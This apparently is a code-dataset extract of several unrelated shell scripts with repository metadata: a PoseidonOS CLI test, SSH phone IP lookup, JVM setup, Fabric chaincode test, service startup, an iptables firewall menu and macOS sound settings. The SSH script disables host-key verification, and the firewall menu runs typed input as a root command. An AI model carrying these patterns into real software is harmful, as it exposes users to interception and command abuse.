echo -[Map : set_user_segment_bitmap]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_user_segment_bitmap --input segmentBitmap.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_segment_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_segment_info --output segmentInfo.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : set_segment_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt set_segment_info --input segmentInfo.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[Map : get_segment_valid_count]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt get_segment_valid_count --output segValidCount.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -------------[User Data IO WBT CMDs]------------------------------------
MAXCOUNT=3
count=0
lbaIdx=0
lbaCnt=0
while [ "$count" -le $MAXCOUNT ] # ($MAXCOUNT) 개의 랜덤 정수 발생.
do
lbaIdx=$RANDOM
let "lbaIdx %= 1024*8"
lbaCnt=$RANDOM
let "lbaCnt %= 1024"
echo -[IO Path : unvme-ns-${count} : wbt write_raw]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_raw --dev unvme-ns-${count} --lba ${lbaIdx} --count ${lbaCnt} --pattern 0xdeadbeef --output segValidCount.bin --json-res > ${cliOutput}
check_result
if [[ "$ip" =~ "$VM_IP_RANGE_1" ]] || [[ "$ip" =~ "$VM_IP_RANGE_2" ]]; then
echo -[IO Path : unvme-ns-${count} : wbt write_uncorrectable_lba]------------------------------------------
echo -[ wbt write_uncorrectable_lba is not supported at VM Test ]------------------------------------------
else
echo -[IO Path : unvme-ns-${count} : wbt write_uncorrectable_lba]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt write_uncorrectable_lba --dev unvme-ns-${count} --lba ${lbaIdx} --output segValidCount.bin --json-res > ${cliOutput}
check_result
fi
echo -[IO Path : unvme-ns-${count} : wbt flush]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt flush --output segValidCount.bin --json-res > ${cliOutput} --array $ARRAYNAME
check_result
echo -[IO Path : unvme-ns-${count} : wbt read_raw]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt read_raw --dev unvme-ns-${count} --lba ${lbaIdx} --count ${lbaCnt} --output dump.bin --output segValidCount.bin --json-res > ${cliOutput}
if [[ "$ip" =~ "$VM_IP_RANGE_1" ]] || [[ "$ip" =~ "$VM_IP_RANGE_2" ]]; then
check_result
else
check_result_expected_fail
fi
let "count += 1" # 카운터 증가.
done
echo --------------------------------------------------------------------
echo ------------[MetaFs WBT CMDs]------------------------------------------
echo --------------------------------------------------------------------
echo -[MetaFs : mfs_create_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_create_file --name $fileName1 --size $fileSize1 --integrity 0 --access 2 --operation 2 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_open_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_open_file --name ${fileName1} --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
fileDesc1=$(<result.txt)
check_result
echo -[MetaFs : mfs_create_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_create_file --name $fileName2 --size $fileSize2 --integrity 0 --access 2 --operation 2 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_open_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_open_file --name $fileName2 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
fileDesc2=$(<result.txt)
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --output mfs_read_one.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --output mfs_read_two.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_get_file_size]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_get_file_size --fd $fileDesc1 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
fileSize=$(<result.txt)
check_result
echo -[MetaFs : mfs_get_aligned_file_io_size]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_get_aligned_file_io_size --fd $fileDesc1 --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
cat ${cliOutput} | jq ".Response.result.data.returnCode" > result.txt
AlignedFileIoSize=$(<result.txt)
check_result
echo -------------------------------------------------------
echo fileDesc1 = ${fileDesc1} fileDesc2 = ${fileDesc2}
echo fileSize = ${fileSize} AlignedFileIOSize = ${AlignedFileIoSize}
echo -------------------------------------------------------
echo -[MetaFs : mfs_dump_files_list]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_dump_files_list --output $FilesInfoOutput --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
echo ------- [opend files] ---------------------------------
sed 's/},{/\n /g' ../filesInfo.json > result.txt
cat ${scriptPath}/result.txt
echo -------------------------------------------------------
check_result
echo -[MetaFs : mfs_dump_inode_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_dump_inode_info --name $fileName1 --volume 0 --output $InodeOutput --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_dump_inode_info]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_dump_inode_info --name $fileName2 --volume 0 --output $InodeOutput --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc1 --volume 0 --offset $fileOffset1 --count $dataLength1 --output mfs_read_one.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_write_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_write_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --input $inputFile --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_read_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_read_file --fd $fileDesc2 --volume 0 --offset $fileOffset2 --count $dataLength2 --output mfs_read_two.bin --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_close_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_close_file --fd ${fileDesc1} --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_close_file]------------------------------------------
${BIN_DIR}/poseidonos-cli wbt mfs_close_file --fd ${fileDesc2} --volume 0 --array $ARRAYNAME --json-res > ${cliOutput}
check_result
echo -[MetaFs : mfs_setup_meta_fio_test]------------------------------------------
# create 1GB sized volume
${BIN_DIR}/poseidonos-cli volume create -v MetaFsTestVol0 --size 1073741824 --maxiops 0 --maxbw 0 -a $ARRAYNAME
check_result
# mount the volume
${BIN_DIR}/poseidonos-cli volume mount -v MetaFsTestVol0 -a $ARRAYNAME
check_result
# check interface for mesuring metafs performance
${BIN_DIR}/poseidonos-cli wbt mfs_setup_meta_fio_test --name MetaFsTestVol --size 0
check_result
# unmount the volume
${BIN_DIR}/poseidonos-cli volume unmount -v MetaFsTestVol0 -a $ARRAYNAME --force
check_result
echo ------- [Created files] ------------
echo fileDesc1 = ${fileDesc1} fileDesc2 = ${fileDesc2} have closed
sed 's/},{/\n /g' $FilesInfoOutput > result.txt
cat ${scriptPath}/result.txt
echo ----------------------------------
rm -rf result.txt
rm -rf ${inputFile}
rm -rf ${cliOutput}
echo "------------[WBT Test End, Close poseidonos]----------------------------------"
${BIN_DIR}/poseidonos-cli array unmount --array-name $ARRAYNAME --force
${BIN_DIR}/poseidonos-cli system stop --force
if [ $exit_result -eq 0 ]; then
echo -[ Test Success] -
else
echo -[ Test Fail] -
fi
exit $exit_result
| true
|
8264541dec6fc8045bead8c9590ca38192fa29b8
|
Shell
|
kudumi/scripts
|
/phone/ipv4-address-of-phone.sh
|
UTF-8
| 746
| 4.0625
| 4
|
[] |
no_license
|
#!/bin/bash
# Print the IPv4 address reported by each target phone, queried over SSH
# as the "admin" user.

net_id="-i $HOME/.ssh/hq_rsa"
net_opts="-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"

# Print usage and exit successfully.  The previous version ran
# `exit $help_exit` with $help_exit never assigned, so the exit status
# was whatever `cat` happened to return; also, the help text documented
# a nonexistent -d flag instead of -i/--id.
function help_and_quit() {
cat <<EOF
Usage: ${0##*/} [-i private_key] target_ips
 -i, --id   specify the private key file used to login as
            admin on the target phones
EOF
exit 0
}

while [[ $1 == *-* ]]; do # Parse arguments
  case $1 in
    -i|--id )
      net_id="-i $2"
      shift ;;
    -h|--help )
      help_and_quit ;;
    * ) echo "$1 is not a recognized flag." ;;
  esac
  shift
done

# $net_id/$net_opts stay unquoted on purpose so each expands into
# separate ssh arguments; "$@" (was unquoted $*) keeps each target intact.
for target in "$@"; do
  result=$(ssh -q ${net_id} ${net_opts} "admin@${target}" "ifconfig | grep 'inet addr' | grep -v 127.0.0.1 | cut -d':' -f2 | cut -d' ' -f1")
  echo "${target} is ${result}"
done
| true
|
50b3be3a2e787c3b571e72c2d09704512ca984e8
|
Shell
|
jacobke/etrace
|
/etrace-stream/stream-container/script/env.sh
|
UTF-8
| 1,269
| 3.21875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Compose JAVA_OPTS for the stream-container JVM from conf/jvm_conf.sh
# and prepare per-port log directories (gc + heap dumps).
SCRIPT_DIR=$(dirname ${BASH_SOURCE[0]})
BASE_DIR=$(cd ${SCRIPT_DIR} && pwd -P)
JVM_CONF="${BASE_DIR}/../conf/jvm_conf.sh"
if [ ! -f "${JVM_CONF}" ]; then
echo "${JVM_CONF} doesn't exist!!! exit"
sleep 5
# NOTE(review): exits 0 (success) on a missing config -- confirm callers
# do not depend on a non-zero status here.
exit 0
fi
cd "$SCRIPT_DIR/.."
# Provides STREAM_HTTP_PORT, CONTAINER_JVM_XMS and CONTAINER_JVM_XMX
# (presumably among others) -- TODO confirm against conf/jvm_conf.sh.
source "${JVM_CONF}"
JVM_LOGS_DIR=${BASE_DIR}/../logs/${STREAM_HTTP_PORT}
GC_LOGS_DIR=${JVM_LOGS_DIR}/gc
DUMP_LOGS_DIR=${JVM_LOGS_DIR}/dump
if [ ! -d "${GC_LOGS_DIR}" ]; then
mkdir -p "${GC_LOGS_DIR}"
fi
if [ ! -d "${DUMP_LOGS_DIR}" ]; then
mkdir -p "${DUMP_LOGS_DIR}"
fi
# set jvm startup argument
# NOTE(review): the -Dstream.http.port and -Dstream.logs.path lines below
# have no trailing backslash, so JAVA_OPTS contains embedded newlines;
# that only works while the variable is expanded unquoted -- confirm
# this is intended before quoting any ${JAVA_OPTS} use.
JAVA_OPTS="-Xms${CONTAINER_JVM_XMS} \
-Xmx${CONTAINER_JVM_XMX} \
-XX:+UseCompressedOops \
-XX:+ExplicitGCInvokesConcurrent \
-XX:+UseG1GC \
-Djava.awt.headless=true \
-Dstream.http.port=${STREAM_HTTP_PORT}
-Dstream.logs.path=${JVM_LOGS_DIR}
-Dfile.encoding=utf-8 \
-XX:+PrintGC \
-XX:+PrintGCDetails \
-XX:+PrintGCDateStamps \
-Xloggc:${GC_LOGS_DIR}/server.gc.$(date +%Y%m%d-%H%M%S).log \
-XX:-OmitStackTraceInFastThrow \
-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=${DUMP_LOGS_DIR} \
"
export JAVA_OPTS=${JAVA_OPTS}
| true
|
b74a21135998fe0bbd05f4eff6e949973fb2f2ba
|
Shell
|
jinyalin/Myproject
|
/linux-script/startup.sh
|
UTF-8
| 492
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/sh
# Start the MainSever Java service under nohup unless an instance is
# already running.
program="com.hskj.thread.MainSever"
deploypath="/hskj/Deliver32Send"
# PID of any running instance (empty when not running).
pid=$(ps -ef| grep "$program" | grep -v grep|awk '{print $2}')
datetime=$(date +'%Y %m %d %H:%M:%S')
# NOTE(review): unquoted and unchecked -- if the directory is missing the
# script keeps going in the current directory; consider `cd ... || exit 1`.
cd $deploypath
if [ -n "$pid" ];then
echo "$program is already running"
else
# Recreate a fresh, world-readable nohup.out for the new instance.
if [ -f nohup.out ];then
rm -f nohup.out
fi
touch nohup.out && chmod o+r nohup.out
# NOTE(review): '&>' is a bashism; a strict POSIX /bin/sh parses it
# differently -- confirm /bin/sh is bash on the target hosts.
nohup java -Xms1024m -Xmx2048m -Djava.ext.dirs=lib -cp . $program &>nohup.out &
echo "$datetime $program start" >> restart.log
fi
| true
|
385da93249cdb3dd235db5f8ad2ac818a40d66cc
|
Shell
|
luoguohui234/cello
|
/src/agent/docker/_compose_files/fabric-1.0/scripts/notaryinfo_put.sh
|
UTF-8
| 1,805
| 2.578125
| 3
|
[
"CC-BY-4.0",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#
# Copyright O Corp. All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Exercises the "notaryinfo" chaincode: issues `put` invocations from
# peers in four orgs, then reads key history back from several peers.
# chaincodeInvoke, chaincodeQuery, echo_g, echo_b and APP_CHANNEL are
# provided by the sourced func.sh -- confirm against that file.

# Importing useful functions for cc testing
if [ -f ./func.sh ]; then
source ./func.sh
elif [ -f scripts/func.sh ]; then
source scripts/func.sh
fi

CC_NAME="notaryinfo"
#CC_02_INVOKE_ARGS='{"Args":["invoke","a","b","10"]}'
#CC_INVOKE_ARGS=${CC_02_INVOKE_ARGS}
echo_g "=== Testing Chaincode put ==="
#Invoke on chaincode on Peer0/Org1
echo_b "Sending invoke transaction (transfer 10) on org1/peer0..."
chaincodeInvoke ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["put","a","aaazzzzxxxx","b","vvvzzzzxxxx","c","aaazzxxxx"]}'
#Invoke on chaincode on Peer0/Org2
echo_b "Sending invoke transaction (transfer 10) on org1/peer0..."
chaincodeInvoke ${APP_CHANNEL} 2 0 ${CC_NAME} '{"Args":["put","a","ddzzzxxxxx","d","ddddddddzzzxx","b","bbbbzzxxxx"]}'
#Invoke on chaincode on Peer0/Org3
echo_b "Sending invoke transaction (transfer 10) on org1/peer0..."
chaincodeInvoke ${APP_CHANNEL} 3 0 ${CC_NAME} '{"Args":["put","c","cccczzzxxx"]}'
#Invoke on chaincode on Peer0/Org4
echo_b "Sending invoke transaction on org2/peer3..."
chaincodeInvoke ${APP_CHANNEL} 4 0 ${CC_NAME} '{"Args":["put","b","bbbbzzzxxxx","d","ddddddzzzxxxxxx"]}'
# Read back per-key history from different peers to confirm the writes.
chaincodeQuery ${APP_CHANNEL} 3 0 ${CC_NAME} '{"Args":["queryHistory","c"]}'
chaincodeQuery ${APP_CHANNEL} 4 0 ${CC_NAME} '{"Args":["queryHistory","a"]}'
chaincodeQuery ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["queryHistory","a"]}'
# Optional stress loop kept for reference (disabled).
#for((i=1;i<=5000;i++));
#do
# chaincodeInvoke ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["put","a","aaazzzzxxxx","b","vvvzzzzxxxx","c","aaazzxxxx"]}'
# chaincodeInvoke ${APP_CHANNEL} 1 0 ${CC_NAME} '{"Args":["put","a","aaccvxxxx","b","vvvzzcvcvx","c","aacvxvxx"]}'
# sleep 0.01
#done
echo_g "=== Chaincode invoke/query completed ==="
echo
| true
|
5b64ae030ad4366b38781eedc355218eb355e29d
|
Shell
|
bkhadka2/Cyber-Security-Projects
|
/Firewall-Rule-Shell-Code/firewall.sh
|
UTF-8
| 9,882
| 3.6875
| 4
|
[] |
no_license
|
#!/usr/bin/sudo bash
# Top-level interactive menu loop.  whiptail prints the chosen tag to
# stderr, so every call uses the 3>&1 1>&2 2>&3 fd swap to capture it.
# NOTE(review): optionForDifferentRules and builtInFirewallOptions are
# referenced here but defined elsewhere in this script -- confirm they
# exist below this chunk.
function mainMenu {
option=$(whiptail --title "IPTABLES FIREWALL" --menu "Choose an option" 15 65 8 \
"1:" "Display Firewall Rules" \
"2:" "Add Rules Manually" \
"3:" "Choose Rules" \
"4:" "Delete Firewall Rules" \
"5:" "Display All rules in HTML page" \
"6:" "Quit" 3>&1 1>&2 2>&3)
# status is 1 when the user cancelled the dialog.
status=$?
if [[ $option == "1:" ]]; then
# Sub-menu: pick which chain (or all) to display.
choice=$(whiptail --title "IPTABLES FIREWALL Rules" --menu "Choose an option" 15 65 8 \
"a:" "INPUT Rules" \
"b:" "OUTPUT Rules" \
"c:" "FORWARD Rules" \
"d:" "Display All Rules" \
"e:" "Go To Main Menu" 3>&1 1>&2 2>&3)
if [[ $choice == "a:" ]]; then
displayINPUT
optionForDifferentRules
elif [[ $choice == "b:" ]]; then
displayOUTPUT
optionForDifferentRules
elif [[ $choice == "c:" ]]; then
displayFORWARD
optionForDifferentRules
elif [[ $choice == "d:" ]]; then
displayAllRules
optionForDifferentRules
else
mainMenu
fi
elif [[ $option == "2:" ]]; then
optionForAddingRules
elif [[ $option == "3:" ]]; then
builtInFirewallOptions
elif [[ $option == "4:" ]]; then
optionForDeletingRules
elif [[ $option == "5:" ]]; then
# Render the rules to an HTML file and open it in the named user's
# browser session.
htmlFile > fwall.html
username=$(whiptail --inputbox "Type in your Username For Computer" 8 78 --title "Username Box" 3>&1 1>&2 2>&3)
# NOTE(review): `sudo su $username firefox fwall.html` passes firefox as
# an argument to su's shell -- confirm `su - $username -c "firefox ..."`
# was not the intent.
sudo su $username firefox fwall.html
mainMenu
elif [[ $status = 1 ]]; then
exit 0;
else
exit 0
fi
}
#######################################
# Shared renderer: list iptables rules in a whiptail message box.
# Consolidates four near-identical functions; also fixes displayAllRules,
# whose dialog title was copy-pasted as "FORWARD Firewall Rules".
# Arguments:
#   $1 - chain name, or "" for every chain
#   $2 - dialog title
#   $3 - label used in the message text
#   $4 - dialog height
#   $5 - dialog width
#######################################
displayChainRules() {
    local rules
    # $1 intentionally unquoted: when empty it must vanish so iptables
    # lists all chains.
    rules=$(sudo iptables -L $1 --line-numbers)
    whiptail --title "$2" --msgbox "Listed are the $3 rules:\n $rules" "$4" "$5"
}
function displayINPUT {
    displayChainRules INPUT "INPUT Firewall Rules" "INPUT" 20 78
}
function displayOUTPUT {
    displayChainRules OUTPUT "OUTPUT Firewall Rules" "OUTPUT" 20 78
}
function displayFORWARD {
    displayChainRules FORWARD "FORWARD Firewall Rules" "FORWARD" 20 78
}
function displayAllRules {
    displayChainRules "" "All Firewall Rules" "Firewall" 35 90
}
#######################################
# Prompt for a raw iptables command and apply it.
# Fix: the old version never validated anything -- it grepped the *typed
# text* for "Bad argument"/"command not found" (and `|| $(...)` even
# executed grep's stdout as a command), so ordinary valid rules were
# rejected with "No Such Rule exist".  Now the command itself is run and
# its exit status decides which message box is shown.
#######################################
function optionForAddingRules {
    local command status
    command=$(whiptail --inputbox "Type in the command" 8 78 --title "Command Box" 3>&1 1>&2 2>&3)
    status=$?
    if [[ $command == "" ]]; then
        whiptail --title "Messsage box" --msgbox "NO Rule added! Empty provided!! " 20 78
    elif [[ $status = 1 ]]; then
        whiptail --title "Messsage box" --msgbox "No Rule provided to add " 20 78
    else
        # Intentionally unquoted: the typed command must word-split
        # into a program and its arguments.
        if $command > /dev/null 2>&1; then
            whiptail --title "Messsage box" --msgbox "$command INPUT rule added!! " 20 78
        else
            whiptail --title "Messsage box" --msgbox "No Such Rule exist " 20 78
        fi
    fi
    optionForDifferentRules
    mainMenu
}
function htmlFile {
# Emit a simple HTML report of the current INPUT/OUTPUT/FORWARD rules to
# stdout; the caller redirects it into fwall.html.
TITLE=$(hostname)
a=$(sudo iptables -S INPUT)
b=$(sudo iptables -S OUTPUT)
c=$(sudo iptables -S FORWARD)
# NOTE(review): '<<-' strips leading *tabs* only; confirm the heredoc body
# and the _EOF_ terminator are tab-indented (or unindented) in the file.
cat <<- _EOF_
<html>
<head>
<title>Firewall Rules $TITLE</title>
</head>
<body style="background-color:purple;">
<h1 style="color:white; text-align:center;">Firewall Rules: $TITLE</h1>
<br>
<br>
<br>
<h2 style="color:white; text-align:center;"> INPUT RULES: </h2>
<p style="text-align:center; font-size:28px;"> $a </p>
<h2 style="color:white; text-align:center;"> OUTPUT RULES: </h2>
<p style="text-align:center; font-size:28px;"> $b </p>
<h2 style="color:white; text-align:center;"> FORWARD RULES: </h2>
<p style="text-align:center; font-size:28px;"> $c </p>
</body>
</html>
_EOF_
}
# deleteRuleFromChain CHAIN: prompt for a rule number and delete it from
# the given iptables chain, then return to the rules sub-menu.
function deleteRuleFromChain {
  local chain=$1
  local rulenum
  rulenum=$(whiptail --inputbox "Type in the rule number to delete" 8 78 --title "Input Rule #" 3>&1 1>&2 2>&3)
  if [[ $? = 1 ]]; then
    whiptail --title "Messsage box" --msgbox "No rule number provided " 20 78
  else
    # Report which chain the rule was removed from (the original said
    # "OUPUT" for both the OUTPUT and FORWARD branches).
    whiptail --title "Messsage box" --msgbox "Rule # $rulenum deleted from $chain " 20 78
    sudo iptables -D "$chain" "$rulenum"
  fi
  optionForDifferentRules
}
function optionForDeletingRules {
  # Menu for deleting a rule from one of the three built-in chains; the
  # chain's current rules are displayed first so the user can pick a number.
  op=$(whiptail --title "IPTABLES FIREWALL Rules" --menu "Choose an option" 15 65 8 \
  "a:" "Delete INPUT Rules" \
  "b:" "Delete OUTPUT Rules" \
  "c:" "DELETE FORWARD Rules" \
  "d:" "Go To Main Menu" 3>&1 1>&2 2>&3)
  if [[ $op == "a:" ]]; then
    displayINPUT
    deleteRuleFromChain INPUT
  elif [[ $op == "b:" ]]; then
    displayOUTPUT
    deleteRuleFromChain OUTPUT
  elif [[ $op == "c:" ]]; then
    displayFORWARD
    deleteRuleFromChain FORWARD
  else
    mainMenu
  fi
}
function optionForDifferentRules {
  # Sub-menu shown after rule operations: add, delete, or go back.
  local choice
  choice=$(whiptail --title "IPTABLES FIREWALL Rules" --menu "Choose an option" 15 65 8 \
  "a:" "Add Rules" \
  "b:" "Delete Rules" \
  "c:" "Go to Main Menu" 3>&1 1>&2 2>&3)
  case "$choice" in
    "a:") optionForAddingRules ;;
    "b:") optionForDeletingRules ;;
    *) mainMenu ;;
  esac
}
function builtInFirewallOptions {
# Menu of canned firewall actions (block ping/site/MAC/TCP/SSH/SMTP).
# NOTE(review): every branch shows its success message *before* running
# iptables and never checks the command's exit status; the $(...) capture
# into $bashcommand discards nothing useful (iptables prints no output on
# success) — confirm whether failures should be surfaced.
options=$(whiptail --title "IPTABLES FIREWALL OPTIONS" --menu "Choose a firewall option" 15 65 8 \
"a:" "Block ping from an ipaddress" \
"b:" "Block any site EX: www.facebook.com" \
"c:" "Block specific MAC Address" \
"d:" "Block all TCP request" \
"e:" "Block ssh connections" \
"f:" "Block Outgoing SMTP mail" \
"g:" "Go to Main Menu" 3>&1 1>&2 2>&3)
if [[ $options == "a:" ]]; then
ip=$(whiptail --inputbox "Type IPADDRESS to block to ping" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "IPADDRESS $ip is blocked to ping!! " 20 78
bashcommand=$(sudo iptables -A INPUT -s $ip -p icmp -j DROP)
fi
mainMenu
elif [[ $options == "b:" ]]; then
# Resolve the site with host(1), then let the user paste one of the IPs.
site=$(whiptail --inputbox "Type the URL of the site starting from WWW." 8 78 --title "URL Box" 3>&1 1>&2 2>&3)
ip=$(host $site)
whiptail --title "Copy the IP of the site" --msgbox "Copy the IP:\n $ip" 20 78
input=$(whiptail --inputbox "Paste IPADDRESS of the site" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "IPADDRESS $input is blocked!! " 20 78
bashcommand=$(sudo iptables -A OUTPUT -p tcp -d $input -j DROP)
fi
mainMenu
elif [[ $options == "c:" ]]; then
input=$(whiptail --inputbox "Enter MAC address format=00:00:00:00:00:00" 8 78 --title "MAC Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No MAC address provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "MAC address $input is blocked!! " 20 78
bashcommand=$(sudo iptables -A INPUT -m mac --mac-source $input -j DROP)
fi
mainMenu
elif [[ $options == "d:" ]]; then
input=$(whiptail --inputbox "Enter IP address" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "IP address $input is blocked from all TCP!! " 20 78
bashcommand=$(sudo iptables -A INPUT -p tcp -s $input -j DROP)
fi
mainMenu
elif [[ $options == "e:" ]]; then
input=$(whiptail --inputbox "Enter IP address" 8 78 --title "IP Box" 3>&1 1>&2 2>&3)
status=$?
if [[ $status = 1 ]]; then
whiptail --title "Messsage box" --msgbox "No IPADDRESS provided!! " 20 78
else
whiptail --title "Messsage box" --msgbox "SSH connections blocked from $input!! " 20 78
bashcommand=$(sudo iptables -A INPUT -p tcp --dport ssh -s $input -j DROP)
fi
mainMenu
elif [[ $options == "f:" ]]; then
# Port 25 = SMTP; REJECT (not DROP) so local senders fail fast.
sudo iptables -A OUTPUT -p tcp --dport 25 -j REJECT
whiptail --title "Messsage box" --msgbox "Port 25 is blocked for outgoing mail " 20 78
mainMenu
else
mainMenu
fi
}
# Entry point: start the interactive firewall menu loop.
mainMenu
| true
|
5f71042f02856a686707ce5f03a9c38b01307ca9
|
Shell
|
lix90/bm_etl_admin
|
/bk/check_jobstatus2.sh
|
UTF-8
| 976
| 3.140625
| 3
|
[] |
no_license
|
#!/bin/sh
# Inspect a DataStage dsjob log file ($1) and derive a job status code.
# Assumes DSSERVER/DSUSER/DSPASSWORD/DSPROJECT/jobunit/binfiledirectory are
# exported by the calling environment -- TODO confirm against the caller.
jobwaiting=`grep "Waiting for job..." $1`
endtime=`date +%Y%m%d_%H%M%S`
# jobstatus: 1 if the log reached "Waiting for job...", -1 otherwise.
# (NOTE(review): the '.' characters in the grep pattern are regex wildcards.)
if [ "${jobwaiting}" != "Waiting for job..." ]; then
jobstatus=-1
else
jobstatus=1
fi
# Append the job's info block to the log, then parse the number inside
# "Job Status (N)".
${binfiledirectory}/dsjob \
-server ${DSSERVER} \
-user ${DSUSER} \
-password ${DSPASSWORD} \
-jobinfo ${DSPROJECT} ${jobunit} \
>> $1
error=`grep "Job Status" $1`
error=${error##*\(}
error=${error%%\)*}
# Status 1 (finished OK) or 2 (finished with warnings) map to 0 (success);
# any other status code is propagated verbatim.
if [ "${jobstatus}" != "1" ]; then
jobstatus=-1
else
if [ "${error}" = "1" -o "${error}" = "2" ]; then
jobstatus=0
else
jobstatus=${error}
fi
# For any non-clean finish, append the job's log summary for diagnosis.
if [ ! "${error}" = "1" ]; then
${binfiledirectory}/dsjob \
-server ${DSSERVER} \
-user ${DSUSER} \
-password ${DSPASSWORD} \
-logsum ${DSPROJECT} ${jobunit} \
>> $1
fi
fi
| true
|
ea7ca196878c1127fec73209ce5e0b731376b249
|
Shell
|
urmyfaith/sinstallation
|
/preferences/sound.sh
|
UTF-8
| 2,918
| 2.65625
| 3
|
[] |
no_license
|
################################################################################
# Sound
################################################################################
# Toggle the Mac startup chime: "enabled" restores the firmware default
# volume, anything else writes a muting value.
function osx_sound_startup_chime {
  if [[ "$1" == "enabled" ]]; then
    sudo nvram -d SystemAudioVolume
  else
    sudo nvram SystemAudioVolume=" "
  fi
}
# Toggle the feedback beep played when changing the volume.
function osx_sound_volume_feedback {
  local flag=0
  [[ "$1" == "enabled" ]] && flag=1
  defaults write NSGlobalDomain com.apple.sound.beep.feedback -int $flag
}
# Set the audio bitpool values for Bluetooth audio devices.
function osx_sound_bluetooth_optimum {
  local agent="com.apple.BluetoothAudioAgent"
  defaults write "$agent" "Apple Bitpool Min (editable)" 35
  defaults write "$agent" "Apple Initial Bitpool Min (editable)" 53
  defaults write "$agent" "Apple Initial Bitpool (editable)" 35
}
# Toggle UI sound effects ($1: "enabled"/anything else) and set the beep
# volume ($2, a float).
function osx_sound_ui {
  local on_bool="false" on_int="0"
  if [[ "$1" == "enabled" ]]; then
    on_bool="true"
    on_int="1"
  fi
  local volume="$2"
